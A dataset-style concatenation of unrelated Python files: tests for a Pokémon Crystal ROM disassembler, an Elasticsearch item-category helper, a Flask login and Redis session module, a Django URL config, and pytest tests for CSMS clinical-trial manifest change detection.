        self.assertEqual(len(g), 42)
        self.assertEqual(len(g[0]), 13)
        self.assertEqual(g[1], [184, 174, 180, 211, 164, 127, 20, 231, 81])
    def test_parse_text_at2(self):
        # decoded text must contain known words from Oak's speech
        oakspeech = parse_text_at2(0x197186, 601, debug=False)
        self.assertIn("encyclopedia", oakspeech)
        self.assertIn("researcher", oakspeech)
        self.assertIn("dependable", oakspeech)
    def test_parse_text_engine_script_at(self):
        p = parse_text_engine_script_at(0x197185, debug=False)
        self.assertEqual(len(p.commands), 2)
        self.assertEqual(len(p.commands[0]["lines"]), 41)
    # don't really care about these other two
    def test_parse_text_from_bytes(self): pass
    def test_parse_text_at(self): pass
class TestScript(unittest.TestCase):
    """for testing parse_script_engine_script_at and script parsing in
    general. Script should be a class."""
    #def test_parse_script_engine_script_at(self):
    #    pass # or raise NotImplementedError, bryan_message
    def test_find_all_text_pointers_in_script_engine_script(self):
        # parse a known script and confirm a known text pointer is found
        address = 0x197637 # 0x197634
        script = parse_script_engine_script_at(address, debug=False)
        bank = calculate_bank(address)
        r = find_all_text_pointers_in_script_engine_script(script, bank=bank, debug=False)
        results = list(r)
        self.assertIn(0x197661, results)
class TestLabel(unittest.TestCase):
    """Tests for the Label value object."""
    def test_label_making(self):
        # Label must expose name (str), address (non-str) and line_number
        # (non-str) exactly as given to the constructor.
        line_number = 2
        address = 0xf0c0
        label_name = "poop"
        l = Label(name=label_name, address=address, line_number=line_number)
        self.failUnless(hasattr(l, "name"))
        self.failUnless(hasattr(l, "address"))
        self.failUnless(hasattr(l, "line_number"))
        self.failIf(isinstance(l.address, str))
        self.failIf(isinstance(l.line_number, str))
        self.failUnless(isinstance(l.name, str))
        self.assertEqual(l.line_number, line_number)
        self.assertEqual(l.name, label_name)
        self.assertEqual(l.address, address)
class TestByteParams(unittest.TestCase):
    """Tests for single-byte parameter classes (the ROM byte at address 10
    is 0x2d == 45, which all the expectations below rely on)."""
    @classmethod
    def setUpClass(cls):
        # load the ROM once and share one SingleByteParam across tests
        load_rom()
        cls.address = 10
        cls.sbp = SingleByteParam(address=cls.address)
    @classmethod
    def tearDownClass(cls):
        del cls.sbp
    def test__init__(self):
        self.assertEqual(self.sbp.size, 1)
        self.assertEqual(self.sbp.address, self.address)
    def test_parse(self):
        self.sbp.parse()
        self.assertEqual(str(self.sbp.byte), str(45))
    def test_to_asm(self):
        # hex by default; decimal when should_be_decimal is set
        self.assertEqual(self.sbp.to_asm(), "$2d")
        self.sbp.should_be_decimal = True
        self.assertEqual(self.sbp.to_asm(), str(45))
    # HexByte and DollarSignByte are the same now
    def test_HexByte_to_asm(self):
        h = HexByte(address=10)
        a = h.to_asm()
        self.assertEqual(a, "$2d")
    def test_DollarSignByte_to_asm(self):
        d = DollarSignByte(address=10)
        a = d.to_asm()
        self.assertEqual(a, "$2d")
    def test_ItemLabelByte_to_asm(self):
        # known item bytes render as their label; unknown ones fall back to hex
        i = ItemLabelByte(address=433)
        self.assertEqual(i.byte, 54)
        self.assertEqual(i.to_asm(), "COIN_CASE")
        self.assertEqual(ItemLabelByte(address=10).to_asm(), "$2d")
    def test_DecimalParam_to_asm(self):
        d = DecimalParam(address=10)
        x = d.to_asm()
        self.assertEqual(x, str(0x2d))
class TestMultiByteParam(unittest.TestCase):
    """Tests for multi-byte parameter classes (little-endian word at
    address 443 renders as $f0c0)."""
    def setup_for(self, somecls, byte_size=2, address=443, **kwargs):
        # helper: construct the class under test and sanity-check its fields
        self.cls = somecls(address=address, size=byte_size, **kwargs)
        self.assertEqual(self.cls.address, address)
        self.assertEqual(self.cls.bytes, rom_interval(address, byte_size, strings=False))
        self.assertEqual(self.cls.size, byte_size)
    def test_two_byte_param(self):
        self.setup_for(MultiByteParam, byte_size=2)
        self.assertEqual(self.cls.to_asm(), "$f0c0")
    def test_three_byte_param(self):
        self.setup_for(MultiByteParam, byte_size=3)
    def test_PointerLabelParam_no_bank(self):
        self.setup_for(PointerLabelParam, bank=None)
        # assuming no label at this location..
        self.assertEqual(self.cls.to_asm(), "$f0c0")
        global all_labels
        # hm.. maybe all_labels should be using a class?
        # once a matching label exists, to_asm emits the label name instead
        all_labels = [{"label": "poop", "address": 0xf0c0,
                       "offset": 0xf0c0, "bank": 0,
                       "line_number": 2
                      }]
        self.assertEqual(self.cls.to_asm(), "poop")
class TestPostParsing: #(unittest.TestCase):
    """tests that must be run after parsing all maps

    NOTE(review): deliberately NOT a unittest.TestCase subclass (see the
    commented-out base class) so the suite loader skips it -- setUpClass
    runs the full run_main() parse, which is expensive.
    """
    @classmethod
    def setUpClass(cls):
        run_main()
    def test_signpost_counts(self):
        self.assertEqual(len(map_names[1][1]["signposts"]), 0)
        self.assertEqual(len(map_names[1][2]["signposts"]), 2)
        self.assertEqual(len(map_names[10][5]["signposts"]), 7)
    def test_warp_counts(self):
        self.assertEqual(map_names[10][5]["warp_count"], 9)
        self.assertEqual(map_names[18][5]["warp_count"], 3)
        self.assertEqual(map_names[15][1]["warp_count"], 2)
    def test_map_sizes(self):
        self.assertEqual(map_names[15][1]["height"], 18)
        self.assertEqual(map_names[15][1]["width"], 10)
        self.assertEqual(map_names[7][1]["height"], 4)
        self.assertEqual(map_names[7][1]["width"], 4)
    def test_map_connection_counts(self):
        self.assertEqual(map_names[7][1]["connections"], 0)
        self.assertEqual(map_names[10][1]["connections"], 12)
        self.assertEqual(map_names[10][2]["connections"], 12)
        self.assertEqual(map_names[11][1]["connections"], 9) # or 13?
    def test_second_map_header_address(self):
        self.assertEqual(map_names[11][1]["second_map_header_address"], 0x9509c)
        self.assertEqual(map_names[1][5]["second_map_header_address"], 0x95bd0)
    def test_event_address(self):
        self.assertEqual(map_names[17][5]["event_address"], 0x194d67)
        self.assertEqual(map_names[23][3]["event_address"], 0x1a9ec9)
    def test_people_event_counts(self):
        self.assertEqual(len(map_names[23][3]["people_events"]), 4)
        self.assertEqual(len(map_names[10][3]["people_events"]), 9)
class TestMetaTesting(unittest.TestCase):
    """test whether or not i am finding at least
    some of the tests in this file"""
    tests = None
    def setUp(self):
        # collect the module's TestCase classes once, lazily
        if self.tests == None:
            self.__class__.tests = assemble_test_cases()
    def test_assemble_test_cases_count(self):
        "does assemble_test_cases find some tests?"
        self.failUnless(len(self.tests) > 0)
    def test_assemble_test_cases_inclusion(self):
        "is this class found by assemble_test_cases?"
        # i guess it would have to be for this to be running?
        self.failUnless(self.__class__ in self.tests)
    def test_assemble_test_cases_others(self):
        "test other inclusions for assemble_test_cases"
        self.failUnless(TestRomStr in self.tests)
        self.failUnless(TestCram in self.tests)
    def test_check_has_test(self):
        # substring semantics: test_beaver_2 still counts as a test of beaver
        self.failUnless(check_has_test("beaver", ["test_beaver"]))
        self.failUnless(check_has_test("beaver", ["test_beaver_2"]))
        self.failIf(check_has_test("beaver_1", ["test_beaver"]))
    def test_find_untested_methods(self):
        untested = find_untested_methods()
        # the return type must be an iterable
        self.failUnless(hasattr(untested, "__iter__"))
        #.. basically, a list
        self.failUnless(isinstance(untested, list))
    def test_find_untested_methods_method(self):
        """create a function and see if it is found"""
        # setup a function in the global namespace
        global some_random_test_method
        # define the method
        def some_random_test_method(): pass
        # first make sure it is in the global scope
        members = inspect.getmembers(sys.modules[__name__], inspect.isfunction)
        func_names = [functuple[0] for functuple in members]
        self.assertIn("some_random_test_method", func_names)
        # test whether or not it is found by find_untested_methods
        untested = find_untested_methods()
        self.assertIn("some_random_test_method", untested)
        # remove the test method from the global namespace
        del some_random_test_method
    def test_load_tests(self):
        loader = unittest.TestLoader()
        suite = load_tests(loader, None, None)
        # NOTE(review): the next line is a no-op expression (its value is
        # discarded); presumably it only asserts that the attribute exists
        suite._tests[0]._testMethodName
        membership_test = lambda member: \
            inspect.isclass(member) and issubclass(member, unittest.TestCase)
        tests = inspect.getmembers(sys.modules[__name__], membership_test)
        classes = [x[1] for x in tests]
        # every test in the suite must come from a class in this module
        for test in suite._tests:
            self.assertIn(test.__class__, classes)
    def test_report_untested(self):
        untested = find_untested_methods()
        output = report_untested()
        if len(untested) > 0:
            self.assertIn("NOT TESTED", output)
            for name in untested:
                self.assertIn(name, output)
        elif len(untested) == 0:
            self.assertNotIn("NOT TESTED", output)
def assemble_test_cases():
    """finds classes that inherit from unittest.TestCase
    because i am too lazy to remember to add them to a
    global list of tests for the suite runner"""
    module_members = inspect.getmembers(sys.modules[__name__], inspect.isclass)
    return [klass for (_name, klass) in module_members
            if issubclass(klass, unittest.TestCase)]
def load_tests(loader, tests, pattern):
    """Build a TestSuite containing every TestCase subclass in this module.

    Implements the standard unittest load_tests protocol; `tests` and
    `pattern` are accepted for protocol compatibility but unused.
    """
    suite = unittest.TestSuite()
    for case_class in assemble_test_cases():
        suite.addTests(loader.loadTestsFromTestCase(case_class))
    return suite
def check_has_test(func_name, tested_names):
    """checks if there is a test dedicated to this function

    A function counts as tested when "test_<func_name>" occurs as a
    substring of any name in tested_names (so "test_beaver_2" covers
    "beaver"). Returns a bool.
    """
    # The original also did an exact list-membership check first, but that
    # case is subsumed by the substring scan ("test_x" in "test_x" is True).
    target = "test_" + func_name
    return any(target in name for name in tested_names)
def find_untested_methods():
    """finds all untested functions in this module
    by searching for method names in test case
    method names.

    Returns a list of module-level function names that have no matching
    test_<name> method in any TestCase class, skipping a small avoid-list
    and any name starting with an underscore.

    NOTE(review): this module targets Python 2 -- under Python 3,
    inspect.ismethod finds nothing on a class object (methods there are
    plain functions), which would make tested_names empty.
    """
    untested = []
    avoid_funcs = ["main", "run_tests", "run_main", "copy", "deepcopy"]
    test_funcs = []
    # get a list of all classes in this module
    classes = inspect.getmembers(sys.modules[__name__], inspect.isclass)
    # for each class..
    for (name, klass) in classes:
        # only look at those that have tests
        if issubclass(klass, unittest.TestCase):
            # look at this class' methods
            funcs = inspect.getmembers(klass, inspect.ismethod)
            # for each method..
            for (name2, func) in funcs:
                # store the ones that begin with test_
                if "test_" in name2 and name2[0:5] == "test_":
                    test_funcs.append([name2, func])
    # assemble a list of all test method names (test_x, test_y, ..)
    tested_names = [funcz[0] for funcz in test_funcs]
    # now get a list of all functions in this module
    funcs = inspect.getmembers(sys.modules[__name__], inspect.isfunction)
    # for each function..
    for (name, func) in funcs:
        # we don't care about some of these
        if name in avoid_funcs: continue
        # skip functions beginning with _
        if name[0] == "_": continue
        # check if this function has a test named after it
        has_test = check_has_test(name, tested_names)
        if not has_test:
            untested.append(name)
    return untested
def report_untested():
    """
    This reports about untested functions in the global namespace. This was
    originally in the crystal module, where it would list out the majority of
    the functions. Maybe it should be moved back.

    Returns a string of the form:
        NOT TESTED: [name1, name2, ...]
        total untested: N
    """
    untested = find_untested_methods()
    # str.join replaces the original first/rest loop and yields the exact
    # same comma-separated listing (including the empty-list case)
    output = "NOT TESTED: [" + ", ".join(untested) + "]\n"
    output += "total untested: " + str(len(untested))
    return output
def run_tests(): # rather than unittest.main()
    """Run the assembled test suite verbosely, then print the untested report."""
    loader = unittest.TestLoader()
    suite = load_tests(loader, None, None)
    unittest.TextTestRunner(verbosity=2).run(suite)
    # parenthesized call form: identical output on Python 2 and valid on
    # Python 3 (the bare `print x` statement is a SyntaxError there)
    print(report_untested())
# run the unit tests when this file is executed directly
# (keeps importing this module free of test-running side effects)
if __name__ == "__main__":
    run_tests()
| UTF-8 | Python | false | false | 37,500 | py | 147 | tests.py | 8 | 0.613095 | 0.585065 | 0 | 1,014 | 35.976331 | 95 |
naveenpras/listapi | 16,363,825,397,813 | 5e6b9fcacf6e5eb10a881358691f786ecefa8c95 | a8b3877bec390809d446e66ce130e1907b3998f5 | /apiservice/utils.py | a6c22e1532d2ca3a045cae1da97ad7990276d53e | [] | no_license | https://github.com/naveenpras/listapi | d42dbcfb459bbabe7e23e2dfd1ea8c9b76c9f31e | d4c439468e7c3329baf6879040a9fb34824bc7f3 | refs/heads/master | 2015-08-11T23:55:16.517765 | 2015-06-24T05:56:09 | 2015-06-24T05:56:09 | 20,580,908 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from elasticutils import S
import logging
logger = logging.getLogger(__name__)
class Utils():
    """Elasticsearch-backed helpers for mapping free-text items to categories."""
    def searchItemAndGetCategory(self,item):
        """Look up *item* in the search index and return its CategoryId (int).

        Tries progressively looser queries -- exact match, then fuzzy, then
        wildcard -- and returns the first hit's category; returns 0 when no
        strategy finds a result.
        """
        logger.debug("Finding Category for:" + item)
        #searchstring = item.lower()
        searchstring = item
        logger.debug("Getting category using match for:" + searchstring)
        # "0" is the not-found sentinel; returned as int(0) below
        categoryid = "0"
        q = S().query(item__match=searchstring)
        if q.count() > 0:
            # take only the top-ranked hit
            result = list(q[:1])[0]
            categoryid = result.CategoryId
            logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId))
            return int(categoryid)
        else:
            logger.debug("Getting category using fuzzy for:" + searchstring)
            q = S().query(item__fuzzy=searchstring)
            if q.count() > 0:
                result = list(q[:1])[0]
                categoryid = result.CategoryId
                logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId))
                return int(categoryid)
            else:
                # last resort: substring match anywhere in the item text
                logger.debug("Getting category using wildcard for:" + searchstring)
                q = S().query(item__wildcard="*" + searchstring + "*")
                if q.count() > 0:
                    result = list(q[:1])[0]
                    categoryid = result.CategoryId
                    logger.debug("\tfound:" + result.item +",category:" + str(result.CategoryId))
                    return int(categoryid)
                else:
                    logger.info("\tCategory not found for item:" + item)
return int(categoryid) | UTF-8 | Python | false | false | 1,608 | py | 28 | utils.py | 17 | 0.536692 | 0.530473 | 0 | 37 | 42.486486 | 97 |
ssurkovs/planerka | 15,479,062,143,907 | f48b644b8025c6ab106dcc3c6eea0c3158924d77 | 56429de82e9539f6165d3ead31b0762e7bd7dd12 | /views/login.py | 681c7c2f21714af0cf26a679b8fea36a16c6429f | [] | no_license | https://github.com/ssurkovs/planerka | 9f2ce82ac3e772764b2bd6b600d83930db516a78 | 8d9abe46b62ba96687e0dddcd9b517504d210970 | refs/heads/master | 2018-10-28T20:09:29.117364 | 2018-10-25T16:08:05 | 2018-10-25T16:08:05 | 112,482,528 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from hashlib import md5
from flask import request, session
from flask_login import LoginManager, login_user, logout_user, current_user
import pickle
from datetime import timedelta
from uuid import uuid4
from redis import Redis
from werkzeug.datastructures import CallbackDict
from flask.sessions import SessionInterface, SessionMixin
from . import app
from models.User import User
from utils.utils import gen_reply
# Configure Flask-Login: bind the manager to the app and name the endpoint
# that unauthenticated requests are redirected to.
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
class RedisSession(CallbackDict, SessionMixin):
    """Server-side session dict stored in Redis, identified by `sid`."""
    def __init__(self, initial=None, sid=None, new=False):
        def on_update(self):
            # NOTE(review): CallbackDict invokes this with the dict itself;
            # the parameter is (confusingly) named `self` here.
            self.modified = True
        CallbackDict.__init__(self, initial, on_update)
        self.sid = sid
        self.new = new
        # dirty flag: save_session only rewrites cookies/Redis when needed
        self.modified = False
class RedisSessionInterface(SessionInterface):
    """Flask session interface persisting sessions in Redis.

    Session payloads are pickled; keys are "<prefix><sid>". Pickle is safe
    here only because the stored data is produced by this server, never by
    the client (the client only holds the opaque sid cookie).
    """
    serializer = pickle
    session_class = RedisSession
    def __init__(self, redis=None, prefix='session:'):
        if redis is None:
            redis = Redis()
        self.redis = redis
        self.prefix = prefix
    def generate_sid(self):
        # random, unguessable session id (uuid4 is os-entropy based)
        return str(uuid4())
    def get_redis_expiration_time(self, app, session):
        # permanent sessions follow the app's lifetime; others last one day
        if session.permanent:
            return app.permanent_session_lifetime
        return timedelta(days=1)
    def open_session(self, app, request):
        # restore the session named by the sid cookie, or start a fresh one
        sid = request.cookies.get(app.session_cookie_name)
        if not sid:
            sid = self.generate_sid()
            return self.session_class(sid=sid, new=True)
        val = self.redis.get(self.prefix + sid)
        if val is not None:
            data = self.serializer.loads(val)
            return self.session_class(data, sid=sid)
        # cookie present but Redis entry expired/missing: new empty session
        return self.session_class(sid=sid, new=True)
    def save_session(self, app, session, response):
        domain = self.get_cookie_domain(app)
        if not session:
            # emptied session: drop the Redis entry and, if it was modified,
            # also clear the client cookie
            self.redis.delete(self.prefix + session.sid)
            if session.modified:
                response.delete_cookie(app.session_cookie_name,
                                       domain=domain)
            return
        redis_exp = self.get_redis_expiration_time(app, session)
        cookie_exp = self.get_expiration_time(app, session)
        val = self.serializer.dumps(dict(session))
        # NOTE(review): argument order (name, value, time) matches the
        # legacy redis-py Redis class; redis-py >= 3.0 expects
        # setex(name, time, value) -- confirm against the pinned redis version
        self.redis.setex(self.prefix + session.sid, val,
                         int(redis_exp.total_seconds()))
        response.set_cookie(app.session_cookie_name, session.sid,
                            expires=cookie_exp, httponly=True,
                            domain=domain)
@login_manager.user_loader
def load_user(id_):
    # Flask-Login callback: reload the User by primary key on each request;
    # returns None when the id is unknown.
    return app.db.query(User).get(id_)
@app.route('/api/v1.0/login', methods=['POST'])
def login():
    """Authenticate a user from a JSON body {"login": ..., "password": ...}.

    On success: logs the user in, populates the server-side session, and
    returns the session summary. On bad parameters or wrong credentials:
    returns a 400 reply (messages are user-facing, in Russian).
    """
    try:
        params = request.json
        username = params['login']
        password = params['password']
    except Exception as e:
        error = 'Не удалось разобрать параметры запроса: {error}'.format(error=e)
        app.logger.error(error)
        return gen_reply(code=400, info=error)
    # SECURITY(review): unsalted md5 is a weak password hash; migrating to
    # bcrypt/argon2 would require rehashing stored credentials, so flagged
    # rather than changed here.
    password = md5(password.encode()).hexdigest()
    # single query checks username, password hash and the enabled flag
    registered_user = \
        app.db.query(User).filter_by(username=str(username),
                                     password=str(password),
                                     enabled=True).first()
    if registered_user is None:
        app.logger.error('Имя пользователя или пароль указаны не верно (login: {}).'.format(username))
        return gen_reply(code=400, info='Не правильно указаны логин/пароль.')
    login_user(registered_user, remember=False)
    current_user.is_authenticated = True
    # mirror the user's profile into the server-side session
    session['config'] = registered_user.get_config()
    session['user_id'] = registered_user.id
    session['login'] = registered_user.username
    session['email'] = registered_user.email
    session['full_name'] = registered_user.description
    user_session = {
        'user_id': session['user_id'],
        'login': session['login'],
        'email': session['email'],
        'config': session['config'],
        'full_name': session['full_name']
    }
    return gen_reply(data=user_session, info='Successful authentication.')
@app.route('/api/v1.0/logout', methods=['GET'])
def logout():
    """End the current user's session and acknowledge with a 200 reply."""
    logout_user()
    reply = gen_reply(code=200, info='User logged out.')
    return reply
| UTF-8 | Python | false | false | 4,386 | py | 45 | login.py | 27 | 0.624271 | 0.619837 | 0 | 133 | 31.218045 | 102 |
OPSRv/backend-mangust | 4,801,773,443,131 | ace675d8cf9fc162ba3bf2f0379d84a623f0f7cc | 1bfdd8eb9857468ad44a522c5b81409f6e4e14e9 | /advertising/urls.py | 792a3f69bf35b478ec46bad4e5f7d208ac3dda44 | [] | no_license | https://github.com/OPSRv/backend-mangust | 75238af8e807b253971b1bee3f87d533fc7cbef3 | 7b40518be0b0c0bbed1da148f7ced18fe05e7be7 | refs/heads/main | 2023-08-14T00:28:49.449284 | 2021-10-14T01:18:34 | 2021-10-14T01:18:34 | 415,135,478 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns
from . import views
# URL routes exposed by the advertising app.
urlpatterns = [
    path('api/advertising/', views.AdvertisingList.as_view()),
]
# Allow optional format suffixes (e.g. "/api/advertising.json") on the routes.
urlpatterns = format_suffix_patterns(urlpatterns)
| UTF-8 | Python | false | false | 244 | py | 33 | urls.py | 33 | 0.778689 | 0.778689 | 0 | 9 | 26.111111 | 62 |
CIMAC-CIDC/cidc-api-gae | 8,753,143,388,037 | 7406f78845076c45e53f7f6f4d45f59e119b19e0 | 7a8c854cb3c4bfe58ecb0a98a4b96e9fa0ee84f3 | /tests/models/test_csms_api.py | 86207f7248a5d2e2995898f0905b0ea9e1f02005 | [
"MIT"
] | permissive | https://github.com/CIMAC-CIDC/cidc-api-gae | 026eeaa5775817538e0adec4d26d31b7f1d944cf | 0c3b02ffd69473bb4b6f81343c1ff3c4d4486031 | refs/heads/master | 2023-08-08T13:24:42.778281 | 2023-07-27T02:32:40 | 2023-07-27T02:32:40 | 194,138,223 | 2 | 6 | MIT | false | 2023-08-16T18:15:01 | 2019-06-27T17:38:32 | 2023-02-21T13:13:07 | 2023-08-16T18:14:59 | 2,978 | 1 | 2 | 1 | Python | false | false | import os
# Pin the process timezone before anything datetime-sensitive is imported,
# so timestamp assertions are environment-independent.
os.environ["TZ"] = "UTC"
from copy import deepcopy
import pytest
from cidc_api.models import TrialMetadata
from cidc_api.models.csms_api import *
from cidc_api.config.settings import PRISM_ENCRYPT_KEY
from cidc_schemas.prism.core import (
_check_encrypt_init,
_encrypt,
set_prism_encrypt_key,
)
from ..csms.data import manifests
from ..csms.utils import validate_json_blob
from ..resources.test_trial_metadata import setup_user
# make sure that the encryption key is set
try:
    _check_encrypt_init()
except:
    # bare except is deliberate best-effort: any "not initialized" signal
    # from prism means we should install the key from settings
    set_prism_encrypt_key(PRISM_ENCRYPT_KEY)
def manifest_change_setup(cidc_api, monkeypatch):
    """Shared fixture: seed trials and pre-insert the usable CSMS manifests.

    Creates "test_trial" (with one participant whose participant_id is
    pre-encrypted, to verify CSMS encryption of new ids) plus a second
    trial "foo", inserts every non-excluded qc_complete/unset-status
    manifest, and validates the resulting trial JSON blob.
    """
    setup_user(cidc_api, monkeypatch)
    # also checks for trial existence in JSON blobs
    metadata_json = {
        "protocol_identifier": "test_trial",
        "participants": [
            # existing participant with encrypted participant_id
            # to make sure that the CSMS API is encrypting new IDs as expected
            {
                "cimac_participant_id": "CTTTP04",
                "participant_id": _encrypt("LOCAL 04"),
                "cohort_name": "Arm_A",
                "samples": [],
            },
        ],
        "shipments": [],
        "allowed_cohort_names": ["Arm_A", "Arm_Z"],
        "allowed_collection_event_names": [
            "Baseline",
            "Pre_Day_1_Cycle_2",
            "On_Treatment",
        ],
    }
    TrialMetadata(trial_id="test_trial", metadata_json=metadata_json).insert()
    # need a second valid trial
    metadata_json["protocol_identifier"] = "foo"
    TrialMetadata(trial_id="foo", metadata_json=metadata_json).insert()
    for manifest in manifests:
        # skip manifests that are mid-processing or explicitly excluded
        if manifest.get("status") not in (None, "qc_complete") or manifest.get(
            "excluded"
        ):
            continue
        # insert manifest before we check for changes
        insert_manifest_into_blob(deepcopy(manifest), uploader_email="test@email.com")
    # should check out, but let's make sure
    validate_json_blob(
        TrialMetadata.select_for_update_by_trial_id("test_trial").metadata_json
    )
def test_detect_changes_when_excluded(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
manifest = [m for m in manifests if m.get("excluded")][0]
assert detect_manifest_changes(manifest, uploader_email="test@email.com") == (
[]
)
def test_change_protocol_identifier_error(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# Test critical changes throws Exception on samples
# a bad ID raises a no trial found like insert_manifest_...
with pytest.raises(Exception, match="No trial found with id"):
# stored on samples, not manifest
new_manifest = deepcopy(manifest)
new_manifest["samples"] = [
{
k: v if k != "protocol_identifier" else "bar"
for k, v in sample.items()
}
for sample in new_manifest["samples"]
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
# a good ID raises a new manifst error
with pytest.raises(NewManifestError):
# stored on samples, not manifest
new_manifest = deepcopy(manifest)
new_manifest["samples"] = [
{
k: v if k != "protocol_identifier" else "foo"
for k, v in sample.items()
}
for sample in new_manifest["samples"]
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
def test_change_manifest_id_error(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
for n, manifest in enumerate(manifests):
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# manifest_id has no such complication, but is also on the samples
# changing the manifest_id makes it new
with pytest.raises(NewManifestError):
new_manifest = deepcopy(manifest)
new_manifest["manifest_id"] = "foo"
new_manifest["samples"] = [
{k: v if k != "manifest_id" else "foo" for k, v in sample.items()}
for sample in new_manifest["samples"]
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
def test_change_cimac_id_error(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# Changing a cimac_id is adding/removing a Sample
## so this is a different error
with pytest.raises(Exception, match="Malformatted cimac_id"):
new_manifest = deepcopy(manifest)
new_manifest["samples"] = [
{k: v if k != "cimac_id" else "foo" for k, v in sample.items()}
if n == 0
else sample
for n, sample in enumerate(new_manifest["samples"])
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
# need to use an actually valid cimac_id
with pytest.raises(Exception, match="Missing sample"):
new_manifest = deepcopy(manifest)
new_manifest["samples"] = [
{
k: v if k != "cimac_id" else "CXXXP0555.00"
for k, v in sample.items()
}
if n == 0
else sample
for n, sample in enumerate(new_manifest["samples"])
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
def test_manifest_non_critical_changes(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
# Test non-critical changes on the manifest itself
keys = {k for manifest in manifests for k in manifest.keys()}
for key in keys:
if key in [
# changing manifest_id would throw NewManifestError
"manifest_id",
# ignored by _calc_differences
"barcode",
"biobank_id",
"entry_number",
"excluded",
"json_data",
"modified_time",
"modified_timestamp",
"qc_comments",
"sample_approved",
"sample_manifest_type",
"samples",
"status",
"submitter",
# ignore ignored CSMS fields
"submitter",
"reason",
"event",
"study_encoding",
"status_log",
]:
continue
# grab a completed manifest
for manifest in manifests:
if (
manifest.get("status") not in (None, "qc_complete")
or manifest.get("excluded")
or key not in manifest
):
continue
new_manifest = deepcopy(manifest)
new_manifest[key] = "foo"
changes = detect_manifest_changes(
new_manifest, uploader_email="test@email.com"
)
assert len(changes) == 1 and changes[0] == Change(
entity_type="shipment",
manifest_id=manifest["manifest_id"],
trial_id=manifest["samples"][0]["protocol_identifier"],
changes={
key: (
manifest[key],
"foo",
)
},
), str(changes)
def test_manifest_non_critical_changes_on_samples(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
# grab a completed manifest
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# Test non-critical changes for the manifest but stored on the samples
for key in ["assay_priority", "assay_type", "sample_manifest_type"]:
if key not in manifest["samples"][0]:
continue
new_manifest = deepcopy(manifest)
if key == "sample_manifest_type":
new_manifest["samples"] = [
{k: v for k, v in sample.items()}
for sample in new_manifest["samples"]
]
for n in range(len(new_manifest["samples"])):
new_manifest["samples"][n].update(
{
"processed_sample_type": "foo",
"sample_manifest_type": "Tissue Scroll",
"processed_sample_derivative": "Germline DNA",
}
)
else:
new_manifest["samples"] = [
{k: v if k != key else "foo" for k, v in sample.items()}
for sample in new_manifest["samples"]
]
changes = detect_manifest_changes(
new_manifest, uploader_email="test@email.com"
)
if key != "sample_manifest_type":
assert len(changes) == 1 and changes[0] == Change(
entity_type="shipment",
manifest_id=manifest["manifest_id"],
trial_id=manifest["samples"][0]["protocol_identifier"],
changes={key: (manifest["samples"][0][key], "foo")},
), str(changes)
def test_sample_non_critical_changes(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
# grab a completed manifest
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# Test non-critical changes on the samples
for key in manifest["samples"][0].keys():
if key in [
# ignore critical changes
"cimac_id",
"collection_event_name",
"manifest_id",
"protocol_identifier",
"recorded_collection_event_name",
"sample_key",
# ignore non-sample level changes
# see test_manifest_non_critical_changes_on_samples
"assay_priority",
"assay_type",
*manifest,
"processed_sample_derivative",
"processed_sample_type",
"receiving_party",
"trial_participant_id",
"type_of_sample",
# ignore list from calc_diff
"barcode",
"biobank_id",
"entry_number",
"event",
"excluded",
"json_data",
"modified_time",
"modified_timestamp",
"qc_comments",
"reason",
"sample_approved",
"sample_manifest_type",
"samples",
"status",
"status_log",
"study_encoding",
"submitter",
]:
continue
new_manifest = deepcopy(manifest)
if key in ["sample_derivative_concentration"]:
new_manifest["samples"] = [
{k: v if k != key else 10 for k, v in sample.items()}
if n == 0
else sample
for n, sample in enumerate(new_manifest["samples"])
]
else:
new_manifest["samples"] = [
{k: v if k != key else "foo" for k, v in sample.items()}
if n == 0
else sample
for n, sample in enumerate(new_manifest["samples"])
]
changes = detect_manifest_changes(
new_manifest, uploader_email="test@email.com"
)
# name change for when we're looking below
if key == "standardized_collection_event_name":
key = "collection_event_name"
elif key == "fixation_or_stabilization_type":
key = "fixation_stabilization_type"
assert len(changes) == 1 and changes[0] == Change(
entity_type="sample",
manifest_id=manifest["manifest_id"],
cimac_id=manifest["samples"][0]["cimac_id"],
trial_id=manifest["samples"][0]["protocol_identifier"],
changes={
key: (
type(changes[0].changes[key][0])(
manifest["samples"][0][
"standardized_collection_event_name"
if key == "collection_event_name"
and "standardized_collection_event_name"
in manifest["samples"][0]
else (
"fixation_stabilization_type"
if key == "fixation_stabilization_type"
else key
)
]
),
new_manifest["samples"][0][key],
)
},
), str(changes)
def test_insert_manifest_into_blob(cidc_api, clean_db, monkeypatch):
"""test that insertion of manifest into blob works as expected"""
# grab a completed manifest
manifest = [
m
for m in manifests
if m.get("status") in (None, "qc_complete") and not m.get("excluded")
][0]
